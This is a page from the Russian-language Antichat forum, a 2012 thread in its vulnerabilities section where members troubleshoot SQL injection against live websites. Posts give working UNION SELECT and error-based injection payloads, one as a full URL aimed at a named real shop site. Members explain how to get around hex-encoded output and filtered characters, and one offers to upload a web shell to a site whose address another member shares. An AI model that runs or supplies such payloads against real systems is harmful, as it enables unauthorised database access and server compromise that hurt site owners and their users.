HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #19131  
Старый 06.01.2012, 22:49
Iggy
Guest
Сообщений: n/a
Провел на форуме:
26362

Репутация: 1
По умолчанию

Цитата:
Сообщение от aydin-ka  
aydin-ka said:
C99 ещё немного угадал бы
Не, маднетовский весит 43кб - этот 28кб

если только упакован

...........

ан не, маднетовский упакованный 43кб весит, так что...
 
Ответить с цитированием

  #19132  
Старый 06.01.2012, 22:51
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от Iggy  
Iggy said:
Не, маднетовский весит 43кб - этот 28кб
если только упакован
...........
ан не, маднетовский упакованный 43кб весит, так что...
так что дай адрес, шелл зальем, самому любопытно стало
 
Ответить с цитированием

  #19133  
Старый 07.01.2012, 02:01
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от M_script  
M_script said:
А так выводит:
?id=14+union+select+1,
hex(
table_name
)
,...,45+from+information_schema.tables--+
так пишет

Unknown column '4348415241435445525F53455453' in 'where clause'
 
Ответить с цитированием

  #19134  
Старый 07.01.2012, 02:05
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
так пишет
Unknown column '4348415241435445525F53455453' in 'where clause'
потому что нужно unhex(hex())

зы

http://www.shop-stroitel.ru/catalog/?id=14+or+1+group+by+concat((select+table_name+fro m+information_schema.tables+limit+0,1),rand(0)|0)+ having+min(0)--+
 
Ответить с цитированием

  #19135  
Старый 07.01.2012, 02:40
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от qaz  
qaz said:
Unknown column '4348415241435445525F53455453' in 'where clause'
Вывод в hex, поэтому нужно конвертировать в строку.

unhex(4348415241435445525F53455453) = 'CHARACTER_SETS'.
 
Ответить с цитированием

  #19136  
Старый 07.01.2012, 02:42
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме:
4512

Репутация: 0
По умолчанию

Цитата:
Сообщение от Iggy  
Iggy said:
Это что у нас за шелл?

https://rdot.org/forum/showthread.php?t=105&page=7 - 65 пост

Внешне похож, размер тоже совпадает (28кб)
 
Ответить с цитированием

  #19137  
Старый 07.01.2012, 19:22
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от None  
…syntax to use near '.tables limit 1,1--' at line 1
запрос такой

SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--

ему точка не нравится, или он запрос урезает?
 
Ответить с цитированием

  #19138  
Старый 07.01.2012, 19:25
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

Цитата:
Сообщение от faza02  
faza02 said:
запрос такой
SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--
ему точка не нравится, или он запрос урезает?
Думаю фильтруется точка.
 
Ответить с цитированием

  #19139  
Старый 07.01.2012, 19:29
Iggy
Guest
Сообщений: n/a
Провел на форуме:
26362

Репутация: 1
По умолчанию

Цитата:
Сообщение от M_script  
M_script said:
https://rdot.org/forum/showthread.php?t=105&page=7 - 65 пост
Внешне похож, размер тоже совпадает (28кб)
Ахаха)) ага, только вот как назло php стоитна выполнение - и качнуть его как не получается))

м, глянул твой пост - красиво вскрыл!
 
Ответить с цитированием

  #19140  
Старый 07.01.2012, 19:33
Чакэ
Guest
Сообщений: n/a
Провел на форуме:
90728

Репутация: 62
По умолчанию

Цитата:
Сообщение от faza02  
faza02 said:
запрос такой
SELECT * FROM articole WHERE id = -797 union select 1,2,table_name,4,5,6,7 infornation_schema.tables limit 1,1--
ему точка не нравится, или он запрос урезает?
infornation написано с ошибкой.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ